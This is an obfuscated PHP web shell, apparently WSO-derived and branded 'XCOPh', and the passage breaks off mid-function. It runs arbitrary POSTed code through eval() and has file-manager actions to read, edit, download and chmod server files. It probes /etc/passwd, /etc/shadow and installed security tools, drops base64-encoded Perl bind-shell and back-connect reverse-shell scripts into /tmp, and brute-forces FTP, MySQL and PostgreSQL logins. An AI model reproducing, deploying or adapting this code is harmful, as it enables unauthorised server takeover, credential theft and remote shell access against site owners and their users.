goto Ee655; Ed7d4: if (!$safe_mode) { error_reporting(0); } goto fe968; Ac31d: if (strtolower(substr(PHP_OS, 0, 3)) ==
"win") { $os = 'win'; } else { $os = 'nix'; } goto E8593; a26d7: @set_time_limit(0); goto c36e0; F9bd1: function
actionPhp() { goto A57d8; a04f8: XCOPhHeader(); goto A8bca; fa21a: if (!empty($_POST['p1'])) { goto B78d9; eca1d: echo
htmlspecialchars(ob_get_clean()); goto a75e2; af505: eval($_POST['p1']); goto eca1d; B78d9: ob_start(); goto af505;
a75e2: } goto f5c51; f5c51: echo '</pre>
</div>'; goto d34f9; d34f9: XCOPhFooter(); goto c4698; Fc1c9: if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto a04f8; E3f36: echo '<h1>Execution PHP-code</h1>
<div class=content>
<form name=pf method=post
onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;">
<textarea name=code class=bigarea
id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit
value=Eval style="margin-top:5px">'; goto ed606; A57d8: if (isset($_POST['ajax'])) { goto c21d6; f56a9: echo
strlen($temp), "\n", $temp; goto b85c3; A0bbb: $temp =
"document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" .
addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; goto f56a9; c21d6:
XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto A6105; A6105: ob_start(); goto Eaf53; b85c3:
exit; goto c2252; Eaf53: eval($_POST['p1']); goto A0bbb; c2252: } goto Fc1c9; ed606: echo ' <input type=checkbox
name=ajax value=1 ' . ($_COOKIE[md5($_SERVER[' HTTP_HOST']) . 'ajax' ] ? 'checked' : '' )
. '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '' )
. 'margin-top:5px;" class=ml1>' ; goto fa21a; A8bca: if (isset($_POST['p2']) && $_POST['p2']=='info' ) {
goto B177d; Ed3a4: $tmp=preg_replace(array('!(body|a:\\w+|body, td, th, h1, h2)
{.*}!msiU', '!td, th {(.*)}!msiU' , '!<img[^>]+>!msiU' ), array('', '.e, .v, .h, .h th {$1}' , '' ), $tmp);
goto bc860; Ec74d: ob_start(); goto C7749; bc860: echo str_replace('<h1', '<h2' , $tmp) . '</div><br>' ;
goto Ad70c; C7749: phpinfo(); goto f2bf4; B177d:
echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>' ; goto Ec74d; f2bf4:
$tmp=ob_get_clean(); goto Ed3a4; Ad70c: } goto E3f36; c4698: } goto B7a38; C15ee: if (empty($_POST['a'])) {
if (isset($default_action) && function_exists('action' . $default_action)) { $_POST['a']=$default_action; }
else { $_POST['a']='SecInfo' ; } } goto a25c3; A54db: if ($os=='win' ) { $home_cwd=str_replace("\\", "/" ,
$home_cwd); $cwd=str_replace("\\", "/" , $cwd); } goto E8eb6; e3323: if (!empty($auth_pass)) { if
(isset($_POST['pass']) && md5($_POST['pass'])==$auth_pass) { XCOPhsetcookie(md5($_SERVER['HTTP_HOST']),
$auth_pass); } if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])]
!=$auth_pass) { XCOPhLogin(); } } goto Ac31d; c36e0: if (get_magic_quotes_gpc()) { goto F86e9; F86e9:
function XCOPhstripslashes($array) { return is_array($array) ? array_map('XCOPhstripslashes', $array) :
stripslashes($array); } goto F14fd; F14fd: $_POST=XCOPhstripslashes($_POST); goto D293a; D293a:
$_COOKIE=XCOPhstripslashes($_COOKIE); goto A617b; A617b: } goto E6a75; A2f53: $default_action='FilesMan' ;
goto b92e5; d0f5d: $home_cwd=@getcwd(); goto D7aba; Dc592: function actionFilesTools() { goto E4815; B0a3c:
if (!file_exists(@$_POST['p1'])) { goto E290e; E290e: echo 'File not exists' ; goto f943f; f943f:
XCOPhFooter(); goto ce307; ce307: return; goto Af8b9; Af8b9: } goto a6106; a939b: echo '</div>' ; goto
C4f22; D0447: cbceb: goto a939b; D5333: echo '<span>Name:</span> ' .
htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ?
XCOPhViewSize(filesize($_POST['p1'])) : '-' ) . ' <span>Permission:</span> ' . XCOPhPermsColor($_POST['p1'])
. ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>' ; goto Be37b; C4f22:
XCOPhFooter(); goto E91c1; Ebcfc: b0f96: goto D0447; C9755: XCOPhHeader(); goto c26e0; Ce3d1: if (!$uid) {
$uid['name']=@fileowner($_POST['p1']); $gid['name']=@filegroup($_POST['p1']); } else {
$gid=@posix_getgrgid(@filegroup($_POST['p1'])); } goto D5333; aecf6: if (is_file($_POST['p1'])) {
$m=array('View', 'Highlight' , 'Download' , 'Hexdump' , 'Edit' , 'Chmod' , 'Rename' , 'Touch' ); } else {
$m=array('Chmod', 'Rename' , 'Touch' ); } goto e3049; afd3c: switch ($_POST['p2']) { case 'view' : goto
B92ac; B92ac: echo '<pre class=ml1>' ; goto eb7ce; deae8: echo '</pre>' ; goto C8a7c; eaea7: if ($fp) { goto
a27be; f1788: Ee035: goto Dd409; Cc94d: goto Af4cf; goto f1788; a27be: Af4cf: goto Db5e4; c763c: echo
htmlspecialchars(@fread($fp, 1024)); goto Cc94d; Db5e4: if (@feof($fp)) { goto Ee035; } goto c763c; Dd409:
@fclose($fp); goto e0b59; e0b59: } goto deae8; eb7ce: $fp=@fopen($_POST['p1'], 'r' ); goto eaea7; C8a7c:
goto cbceb; goto D1959; D1959: case 'highlight' : if (@is_readable($_POST['p1'])) { goto C34cb; A975b: echo
str_replace(array('<span ', ' </span>'), array('<font ', ' </font>'), $code) . '
</div>'; goto Ca189; f16cd: $code = @highlight_file($_POST['p1'], true); goto A975b; C34cb: echo '<div class=ml1
style="background-color: #e1e1e1;color:black;">'; goto f16cd; Ca189: } goto cbceb; case 'chmod': goto B1130; B0cd7:
clearstatcache(); goto d85a1; B1130: if (!empty($_POST['p3'])) { goto f55b6; d19de: --$i; goto e4e5b; E9fe0: $i =
strlen($_POST['p3']) - 1; goto b048a; b048a: fd939: goto Ffa0f; f55b6: $perms = 0; goto E9fe0; fd581: Aa00e: goto
d19de; a400e: a252a: goto D7dd9; e4e5b: goto fd939; goto a400e; D7dd9: if (!@chmod($_POST['p1'], $perms)) { echo
'Can\'t set permissions!<br>
<script>document.mf.p3.value = "";</script>'; } goto b9c9a; Ffa0f: if (!($i >= 0)) { goto a252a; } goto af767; af767:
$perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1); goto fd581; b9c9a: } goto B0cd7; c458f:
goto cbceb; goto Bf288; d85a1: echo '
<script>p3_ = "";</script>
<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input
type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit
value=">>"></form>'; goto c458f; Bf288: case 'edit': goto F2d14; F443c: echo '<form
onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea
name=text
class=bigarea>'; goto ab40c; F2d14: if (!is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; goto cbceb; } goto f150c; c00fa: if ($fp) { goto afe0d; e8426: goto a38e2; goto d0997; d0997: Fb7d8: goto Aacf4; A7c99: echo htmlspecialchars(@fread($fp, 1024)); goto e8426; c1945: if (@feof($fp)) { goto Fb7d8; } goto A7c99; afe0d: a38e2: goto c1945; Aacf4: @fclose($fp); goto Ef695; Ef695: } goto Dbff1; C5bba: goto cbceb; goto a449d; Dbff1: echo '</textarea><input
type=submit value=">>"></form>'; goto C5bba; f150c: if (!empty($_POST['p3'])) { goto a1a61; e8f90: if ($fp)
{ goto C21c4; D7a87: @touch($_POST['p1'], $time, $time); goto f87bf; e57da: echo 'Saved!<br>
<script>p3_ = "";</script>'; goto D7a87; C21c4: @fwrite($fp, $_POST['p3']); goto d12c3; d12c3: @fclose($fp); goto
e57da; f87bf: } goto D19bb; A467d: $_POST['p3'] = substr($_POST['p3'], 1); goto E337d; a1a61: $time =
@filemtime($_POST['p1']); goto A467d; E337d: $fp = @fopen($_POST['p1'], "w"); goto e8f90; D19bb: } goto F443c;
ab40c: $fp = @fopen($_POST['p1'], 'r'); goto c00fa; a449d: case 'hexdump': goto ba42c; B882a: goto cbceb; goto
cfeb7; d3c39: a3f2a: goto Fba99; Ccd63: c8ba6: goto ab794; Bccad: if (!($i < $len)) { goto f7582; } goto D2df7;
ab794: ++$i; goto d491b; f0831: $len=strlen($c); goto cd187; bf2e0: switch (ord($c[$i])) { case 0: $h[2] .=' ' ;
goto a3f2a; case 9: $h[2] .=' ' ; goto a3f2a; case 10: $h[2] .=' ' ; goto a3f2a; case 13: $h[2] .=' ' ; goto
a3f2a; default: $h[2] .=$c[$i]; goto a3f2a; } goto Dcb38; a8336: f7582: goto F7ad4; D2df7: $h[1]
.=sprintf('%02X', ord($c[$i])) . ' ' ; goto bf2e0; B6d66: $h=array('00000000<br>', '', ''); goto f0831; d491b:
goto c89fb; goto a8336; F7ad4: echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222>
<tr>
<td bgcolor=#333333><span style="font-weight: normal;">
<pre>' . $h[0] . '</pre>
</span></td>
<td bgcolor=#282828>
<pre>' . $h[1] . '</pre>
</td>
<td bgcolor=#333333>
<pre>' . htmlspecialchars($h[2]) . '</pre>
</td>
</tr>
</table>'; goto B882a; dd29d: if ($n == 32) { goto D95fd; D95fd: $n = 0; goto c6b11; D5260: $h[1] .= '<br>';
goto Efc24; c6b11: if ($i + 1 < $len) { $h[0] .=sprintf('%08X', $i + 1) . '<br>' ; } goto D5260; Efc24: $h[2]
.="\n" ; goto Fce07; Fce07: } goto Ccd63; ba42c: $c=@file_get_contents($_POST['p1']); goto e7ed9; Dcb38:
C57bc: goto d3c39; Fba99: $n++; goto dd29d; cd187: $i=0; goto Be4f6; Be4f6: c89fb: goto Bccad; e7ed9: $n=0;
goto B6d66; cfeb7: case 'rename' : goto a5b5c; a5b5c: if (!empty($_POST['p3'])) { if (!@rename($_POST['p1'],
$_POST['p3'])) { echo 'Can\' t rename!<br>'; } else { die('
<script>g(null, null, "' . urlencode($_POST['p3']) . '", null, "")</script>'); } } goto bde56; Ed4ed: goto
cbceb; goto d2377; bde56: echo '<form
onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input
type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>">
</form>'; goto Ed4ed; d2377: case 'touch': goto E2fd4; febed: echo '
<script>p3_ = "";</script>
<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input
type=text name=touch value="' . date(" Y-m-d H:i:s", @filemtime($_POST['p1']))
. '"><input type=submit value=">>"></form>' ; goto Ea432; E2fd4: if (!empty($_POST['p3'])) {
$time=strtotime($_POST['p3']); if ($time) { if (!touch($_POST['p1'], $time, $time)) { echo 'Fail!' ;
} else { echo 'Touched!' ; } } else { echo 'Bad time format!' ; } } goto B7f1e; B7f1e:
clearstatcache(); goto febed; Ea432: goto cbceb; goto Bef27; Bef27: } goto Ebcfc; eef38:
echo '<br><br>' ; goto afd3c; Be37b: echo '<span>Change time:</span> ' . date('Y-m-d H:i:s',
filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s',
fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s',
filemtime($_POST['p1'])) . '<br><br>' ; goto B3570; F2001: c9914: goto eef38; B3570: if
(empty($_POST['p2'])) { $_POST['p2']='view' ; } goto aecf6; a6106:
$uid=@posix_getpwuid(@fileowner($_POST['p1'])); goto Ce3d1; e3049: foreach ($m as $v) {
echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST[' p1']) . '\' ,\'' . strtolower($v)
. '\' )">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> '; d0da1: }
goto F2001; E4815: if (isset($_POST['p1'])) { $_POST['p1'] = urldecode($_POST['p1']); } goto D77ce;
D77ce: if (@$_POST['p2'] == 'download') { if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
goto B2bb7; f5391: header("Content-Disposition: attachment; filename=" . basename($_POST['p1'])); goto
Badf8; D1cc1: if ($fp) { goto d6ec3; Eb119: if (@feof($fp)) { goto Be4b8; } goto d7ee8; d6ec3: f7fab:
goto Eb119; E53d9: goto f7fab; goto D1129; c14a5: fclose($fp); goto d119c; D1129: Be4b8: goto c14a5;
d7ee8: echo @fread($fp, 1024); goto E53d9; d119c: } goto C7561; B2bb7: ob_start("ob_gzhandler", 4096);
goto f5391; Badf8: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']);
header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto
f08dc; f08dc: $fp = @fopen($_POST['p1'], "r"); goto D1cc1; C7561: } exit; } goto Aea14; c26e0: echo '
<h1>File tools</h1>
<div class=content>'; goto B0a3c; Aea14: if (@$_POST['p2'] == 'mkfile') { if
(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if ($fp) { $_POST['p2'] = "edit";
fclose($fp); } } } goto C9755; E91c1: } goto cb8a1; Ee655: error_reporting(0); goto C6f8b; B626d:
function actionNetwork() { goto D410e; F99c0: echo "<h1>Network tools</h1>
<div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return
false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br />\r\n\tPort: <input type='text'
name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form
name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
\r\n\t<span>Back-connect [perl]</span><br />\r\n\tServer: <input type='text' name='server'
value='" . $_SERVER[' REMOTE_ADDR']
. "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form><br>"
; goto B3a71; B686c: XCOPhFooter(); goto c688a; B3a71: if (isset($_POST['p1'])) { goto
d8c88; d8c88: function cf($f, $t) { $w=@fopen($f, "w" ) or
@function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t));
@fclose($w); } } goto ea60e; ea60e: if ($_POST['p1']=='bpp' ) { goto E8b5f; caed0:
sleep(1); goto c607c; E8b5f: cf("/tmp/bp.pl", $bind_port_p); goto a275b; f804b:
unlink("/tmp/bp.pl"); goto Dda97; a275b: $out=XCOPhEx("perl
/tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); goto caed0; c607c: echo "
<pre class=ml1>{$out}\n" . XCOPhEx("ps aux | grep bp.pl") . "</pre>"; goto f804b; Dda97: }
goto dfe7c; dfe7c: if ($_POST['p1'] == 'bcp') { goto bb299; bb299: cf("/tmp/bc.pl",
$back_connect_p); goto fd4d4; Cd448: sleep(1); goto F3cb8; F3cb8: echo "
<pre class=ml1>{$out}\n" . XCOPhEx("ps aux | grep bc.pl") . "</pre>"; goto Feb68; fd4d4:
$out = XCOPhEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1
&"); goto Cd448; Feb68: unlink("/tmp/bc.pl"); goto a4948; a4948: } goto B6225; B6225: } goto
F45a0; F301c: $bind_port_p =
"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
goto F99c0; F45a0: echo '</div>'; goto B686c; D410e: XCOPhHeader(); goto E7a5e; E7a5e:
$back_connect_p =
"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
goto F301c; c688a: } goto Faf84; A9559: @ini_set('max_execution_time', 0); goto a26d7; E579f:
function XCOPhScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto
ddd68; be10d: E609b: goto c5288; A56c8: $files[] = $filename; goto f2e49; f2e49: goto E609b; goto
Cd888; Cd888: e05c7: goto ad15d; ad15d: return $files; goto F240e; ddd68: $dh = opendir($dir); goto
be10d; c5288: if (!(false !== ($filename = readdir($dh)))) { goto e05c7; } goto A56c8; F240e: } }
goto b3a8a; Faf84: function actionRC() { if (!@$_POST['p1']) { $a = array("uname" => php_uname(),
"php_version" => phpversion(), "XCOPh_version" => XCOPh_VERSION, "safemode" =>
@ini_get('safe_mode')); echo serialize($a); } else { eval($_POST['p1']); } } goto C15ee; Dfd08:
$color = "#df5"; goto A2f53; D59f0: function actionSecInfo() { goto Af902; de7f3: echo '
</div>'; goto F46cf; e6858: if (function_exists('apache_get_modules')) { XCOPhSecParam('Loaded Apache
modules', implode(', ', apache_get_modules())); } goto C5fa7; a9fe3: function XCOPhSecParam($n, $v) { $v
= trim($v); if ($v) { echo '<span>' . $n . ': </span>'; if (strpos($v, "\n") === false) { echo $v .
'<br>'; } else { echo '
<pre class=ml1>' . $v . '</pre>'; } } } goto e6f9d; ff508: if (function_exists('mssql_connect')) {
$temp[] = "MSSQL"; } goto b7391; b7391: if (function_exists('pg_connect')) { $temp[] = "PostgreSQL"; }
goto e9971; d17d2: XCOPhSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); goto Ea482;
F8397: XCOPhSecParam('Supported databases', implode(', ', $temp)); goto a91ee; Fab09: if ($GLOBALS['os']
== 'nix') { goto D5a13; E7ab5: XCOPhSecParam('Distr name', @file_get_contents('/etc/issue.net')); goto
e753b; B7c40: XCOPhSecParam('OS version', @file_get_contents('/proc/version')); goto E7ab5; a3532:
XCOPhSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#'
onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no'); goto B7c40; e753b: if
(!$GLOBALS['safe_mode']) { goto Bdb9f; d188c: XCOPhSecParam('Downloaders', implode(', ', $temp)); goto
dc721; Af8d9: $temp = array(); goto E03f6; Bfe41: $danger = array('kav', 'nod32', 'bdcored', 'uvscan',
'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc',
'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask',
'zmbscap', 'sawmill', 'wormscan', 'ninja'); goto Dbe95; a1d3a: echo '<br /><span>posix_getpwuid ("Read"
/etc/passwd)</span>
<table>
<form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'>
<tr>
<td>From</td>
<td><input type=text name=param1 value=0></td>
</tr>
<tr>
<td>To</td>
<td><input type=text name=param2 value=1000></td>
</tr>
</table><input type=submit value=">>">
</form>'; goto C472b; Adcaa: foreach ($downloaders as $item) { if (XCOPhWhich($item)) { $temp[] = $item; }
e0292: } goto e4d8d; C472b: if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) &&
is_numeric($_POST['p3'])) { goto a9f5c; e41b1: Ca86a: goto e78f2; e78f2: echo '<br />'; goto e3a42; ee7d9:
Fda09: goto Fc4e7; b2bd8: if ($uid) { $temp .= join(':', $uid) . "\n"; } goto b4471; A3542: $uid =
@posix_getpwuid($_POST['p2']); goto b2bd8; a9f5c: $temp = ""; goto ee7d9; Fc4e7: if (!($_POST['p2'] <=
$_POST['p3'])) { goto Ca86a; } goto A3542; b4471: fe701: goto F469f; E7677: goto Fda09; goto e41b1;
F469f: $_POST['p2']++; goto E7677; e3a42: XCOPhSecParam('Users', $temp); goto Deb8d; Deb8d: } goto
b9a39; dc721: echo '<br/>' ; goto f9a4d; Dd677: d60ad: goto ae869; Dbe95:
$downloaders=array('wget', 'fetch' , 'lynx' , 'links' , 'curl' , 'get' , 'lwp-mirror' ); goto dfc85;
A5886: XCOPhSecParam('Hosts', @file_get_contents('/etc/hosts')); goto a1d3a; Bdb9f:
$userful=array('gcc', 'lcc' , 'cc' , 'ld' , 'make' , 'php' , 'perl' , 'python' , 'ruby' , 'tar' , 'gzip'
, 'bzip' , 'bzip2' , 'nc' , 'locate' , 'suidperl' ); goto Bfe41; F6592: $temp=array(); goto fb4bf;
fb4bf: foreach ($userful as $item) { if (XCOPhWhich($item)) { $temp[]=$item; } da597: } goto D4cac;
f9a4d: XCOPhSecParam('HDD space', XCOPhEx('df -h')); goto A5886; E03f6: foreach ($danger as $item) { if
(XCOPhWhich($item)) { $temp[]=$item; } De04f: } goto Dd677; D4cac: fba82: goto Ad966; dfc85: echo '<br>'
; goto F6592; e4d8d: Cb176: goto d188c; Ad966: XCOPhSecParam('Userful',
implode(', ', $temp)); goto Af8d9; ae869: XCOPhSecParam(' Danger',
implode(', ', $temp)); goto Ff111; Ff111: $temp = array(); goto Adcaa; b9a39: } goto d95f0; D5a13: XCOPhSecParam('
Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\" FilesTools\",
\"/etc/\", \"passwd\")'>[view]</a>" : 'no'); goto a3532; d95f0: } else { goto b23e0; b23e0:
XCOPhSecParam('OS Version', XCOPhEx('ver')); goto debff; debff: XCOPhSecParam('Account Settings',
XCOPhEx('net accounts')); goto ccc27; ccc27: XCOPhSecParam('User Accounts', XCOPhEx('net user')); goto
c3094; c3094: } goto de7f3; C5fa7: XCOPhSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']
? $GLOBALS['disable_functions'] : 'none'); goto b352c; e6f9d: XCOPhSecParam('Server software',
@getenv('SERVER_SOFTWARE')); goto e6858; Af902: XCOPhHeader(); goto C93a5; B9040: if
(function_exists('mysql_get_client_info')) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } goto
ff508; e9971: if (function_exists('oci_connect')) { $temp[] = "Oracle"; } goto F8397; Ea482:
XCOPhSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); goto a854d; b352c:
XCOPhSecParam('Open base dir', @ini_get('open_basedir')); goto d17d2; a91ee: echo '<br>'; goto Fab09;
a854d: XCOPhSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); goto f15be;
C93a5: echo '<h1>Server security information</h1>
<div class=content>'; goto a9fe3; f15be: $temp = array(); goto B9040; F46cf: XCOPhFooter(); goto f7157;
f7157: } goto F9bd1; e7b25: function XCOPhPerms($p) { goto bedee; bff24: $i .= $p & 0x2 ? 'w' : '-';
goto eba42; B1c2a: $i .= $p & 0x100 ? 'r' : '-'; goto b4313; eba42: $i .= $p & 0x1 ? $p & 0x200 ?
't' : 'x' : ($p & 0x200 ? 'T' : '-'); goto E7174; b4313: $i .= $p & 0x80 ? 'w' : '-'; goto C6397;
bedee: if (($p & 0xc000) == 0xc000) { $i = 's'; } elseif (($p & 0xa000) == 0xa000) { $i = 'l'; }
elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif
(($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p &
0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } goto B1c2a; A99c3: $i .= $p & 0x20 ? 'r' : '-';
goto b5989; b5989: $i .= $p & 0x10 ? 'w' : '-'; goto e9073; E7174: return $i; goto B9e56; f4d72: $i
.= $p & 0x4 ? 'r' : '-'; goto bff24; e9073: $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ?
'S' : '-'); goto f4d72; C6397: $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
goto A99c3; B9e56: } goto Ab33f; fe968: $disable_functions = @ini_get('disable_functions'); goto
d0f5d; D7aba: if (isset($_POST['c'])) { @chdir($_POST['c']); } goto Aaf31; D16d3: function
XCOPhEx($in) { goto abfb7; E4e8e: if (function_exists('exec')) { @exec($in, $out); $out =
@join("\n", $out); } elseif (function_exists('passthru')) { goto e995a; e995a: ob_start(); goto
ed4d3; Ddfba: $out = ob_get_clean(); goto Df067; ed4d3: @passthru($in); goto Ddfba; Df067: } elseif
(function_exists('system')) { goto f9ace; b7c66: $out = ob_get_clean(); goto Ffb6d; f9ace:
ob_start(); goto a5407; a5407: @system($in); goto b7c66; Ffb6d: } elseif
(function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,
"r"))) { goto A52af; ae64e: if (@feof($f)) { goto De20e; } goto ec35d; A52af: $out = ""; goto bb9af;
B4238: pclose($f); goto a61eb; e9d3a: goto C225f; goto bdaa6; bb9af: C225f: goto ae64e; ec35d: $out
.= fread($f, 1024); goto e9d3a; bdaa6: De20e: goto B4238; a61eb: } goto Ecaa0; Ecaa0: return $out;
goto fb352; abfb7: $out = ''; goto E4e8e; fb352: } goto B2753; b92e5: $default_use_ajax = true; goto
e80d6; e6d6e: function actionBruteforce() { goto d7768; e5fa3: if (isset($_POST['proto'])) { goto
a7921; bae18: $success = 0; goto a06bf; f9b7a: if ($_POST['proto'] == 'ftp') { function
XCOPhBruteForce($ip, $port, $login, $pass) { goto C66f5; e435e: if (!$fp) { return false; } goto
f1f6e; C66f5: $fp = @ftp_connect($ip, $port ? $port : 21); goto e435e; C0066: return $res; goto
a5a3f; f1f6e: $res = @ftp_login($fp, $login, $pass); goto fe3eb; fe3eb: @ftp_close($fp); goto C0066;
a5a3f: } } elseif ($_POST['proto'] == 'mysql') { function XCOPhBruteForce($ip, $port, $login, $pass)
{ goto F8efb; F8efb: $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass); goto
Bc4e2; B7072: return $res; goto B0e6b; Bc4e2: @mysql_close($res); goto B7072; B0e6b: } } elseif
($_POST['proto'] == 'pgsql') { function XCOPhBruteForce($ip, $port, $login, $pass) { goto Fb8b4;
d3d54: @pg_close($res); goto ce8b9; F9c21: $res = @pg_connect($str); goto d3d54; Fb8b4: $str =
"host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "'
dbname=postgres"; goto F9c21; ce8b9: return $res; goto Fccfa; Fccfa: } } goto bae18; Cf254: echo
"<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto b9d69; F6593:
if ($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if (is_array($temp)) { foreach ($temp as $line)
{ goto a7fad; Bd85c: ++$attempts; goto d3acb; Dff80: if (@$_POST['reverse']) { goto fd74a; A1282: caa9b:
goto bbbee; fd74a: $tmp = ""; goto a7d3a; bbbee: ++$attempts; goto ed788; Dd453: $tmp .= $line[0][$i];
goto a3141; F8167: if (!($i >= 0)) { goto caa9b; } goto Dd453; ed788: if (XCOPhBruteForce(@$server[0],
@$server[1], $line[0], $tmp)) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' .
htmlspecialchars($tmp); } goto Af4db; a3141: F275f: goto c8f4e; a7618: A2524: goto F8167; C9e8b: goto
A2524; goto A1282; a7d3a: $i = strlen($line[0]) - 1; goto a7618; c8f4e: --$i; goto C9e8b; Af4db: } goto
